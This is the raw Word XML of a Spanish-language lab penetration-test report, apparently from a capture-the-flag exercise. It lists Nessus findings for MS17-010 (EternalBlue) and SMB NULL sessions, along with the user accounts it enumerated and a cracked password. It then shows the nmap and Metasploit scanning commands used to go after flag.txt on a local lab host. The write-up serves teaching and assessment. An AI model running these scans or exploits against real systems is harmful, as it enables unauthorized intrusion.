            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?8dcab5e4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?234f8ef8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://</w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">www.nessus.org/u?4c7e0cf3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/stamparm/EternalRocks/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?59db5b5b</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: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Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)</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Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)</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Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)</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Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)</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Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">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75">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/42315</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff9900"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff9900"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">26920 - Microsoft Windows SMB NULL Session Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: CVE-2002-1117, CVE-1999-0520, CVE-1999-0519</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El host remoto está ejecutando Microsoft Windows. Es posible iniciar sesión usando una sesión NULL (es decir, sin nombre de usuario o contraseña). Dependiendo de la configuración, es posible que un atacante remoto no autenticado aproveche este problema para obtener información sobre el host remoto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vínculos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://vulners.com/nessus/SMB_NULL_SESSION.NASL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1117</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0520</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0519</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId32">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2002-1117</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2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuentas de usuario encontradas en el sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrador           </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Asistente de ayuda</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invitado                 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mr.X</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spy                      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPPORT_388945a0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usuario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3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Se adjunta el archivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4972050" cy="830238"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="3512" t="70945"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4972050" cy="8302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3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El hash decodificado es </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ha4ck_Th1s_B0X!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>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8f20ct2wv38a" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">taque</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nuestro objetivo es capturar el archivo flag.txt. para ellos usamos el metasploit para escanear y atacar la pc exploitable.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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sV -O -oX scan.xml 192.168.0.4</w:t>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731200" cy="2933700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db_import scan.xml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts -c address,mac,os_family,service_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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z w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts -R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1257300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scanner/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portscan/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="508000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
